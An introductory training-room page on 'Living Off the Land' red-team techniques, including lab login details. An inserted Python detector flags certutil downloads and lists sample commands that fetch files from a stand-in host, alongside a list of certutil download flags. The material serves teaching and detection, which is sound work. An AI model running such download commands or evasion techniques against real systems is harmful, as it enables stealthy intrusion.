
Living Off the Land

Premium room

Learn the essential concept of "Living Off the Land" in Red Team engagements.

medium

60 min


What is "Living Off the Land"?

Living Off the Land is a trending term in the red team community. The name comes from the real-life practice of living by eating the food available on the land. Similarly, adversaries and malware creators take advantage of a target computer's built-in tools and utilities. The term Living Off the Land was introduced at DerbyCon3 in 2013 and has gained traction in the red team community ever since, becoming an often-used and popular technique.


These built-in tools perform routine tasks on the target system or network; however, they are increasingly abused, for example, by using the CertUtil tool to download malicious files onto the target machine.

The primary idea is to use Microsoft-signed programs, scripts, and libraries to blend in and evade defensive controls. Red teamers do not want to be detected while carrying out engagement activities on the target, so using these tools is a safer way to maintain stealth.
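A defender's view of the CertUtil example above, as an added example that is not part of the original room: because the binary is Microsoft-signed, the check has to look at the command line rather than at the file. It assumes process-creation events using Sysmon Event ID 1 field names (Image, OriginalFileName, CommandLine); the sample records and the example.test URLs are constructed.

```python
import ntpath
import re

DOWNLOAD_FLAGS = {"urlcache", "verifyctl"}  # certutil verbs that can fetch a remote URL
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)

SAMPLE_EVENTS = [  # constructed records, not taken from the room
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Temp\setup.msi SHA256"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://files.example.test/a.bin C:\Users\Public\a.bin"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r'CertUtil.exe /URLCACHE /f "https://files.example.test/b.txt" b.txt'},
    {"Image": r"C:\Users\Public\cu.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"cu.exe -urlcache -f https://files.example.test/c.dat c.dat"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe -f https://files.example.test/d.txt"},
]

def is_certutil(event):
    """True if the process is certutil.exe, judged by image name or OriginalFileName."""
    image = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    return "certutil.exe" in (image, original)

def flags_of(command_line):
    """Lower-cased switches, normalised so -switch and /switch compare equal."""
    tokens = [t.strip("\"'") for t in command_line.split()]
    return {t[1:].lower() for t in tokens if t[:1] in ("-", "/")}

def detect(event):
    """Return the remote URL if the event looks like a certutil download, else None."""
    if not is_certutil(event):
        return None
    cmd = event.get("CommandLine", "")
    url = URL_RE.search(cmd)
    if url and DOWNLOAD_FLAGS & flags_of(cmd):
        return url.group(0)
    return None

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(detect(ev), "<-", ev["CommandLine"])
```

Routine certutil use such as hashing a file or listing a certificate store is left alone; only a download verb combined with a remote URL is reported.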

The following are some categories that Living Off the Land encompasses:

  • Reconnaissance
  • File operations
  • Arbitrary code execution
  • Lateral movement
  • Security product bypass

Learning objectives

  • Learn about the term Living Off the Land in red team engagements.
  • Learn about the LOLBAS project and how to use it.
  • Understand and apply the techniques used in red teaming engagements.

Room prerequisites

We have provided a Windows 10 Pro machine to complete this room. You can use the in-browser feature, or if you prefer to connect via RDP, make sure you deploy the AttackBox or connect to the .

Use the following credentials.

Machine IP: MACHINE_IP
Username: thm
Password: TryHackM3

Connect to the via client

    user@machine$ xfreerdp /v:MACHINE_IP /u:thm /p:TryHackM3

Answer the questions below
Deploy the provided machine and move on to the next task.
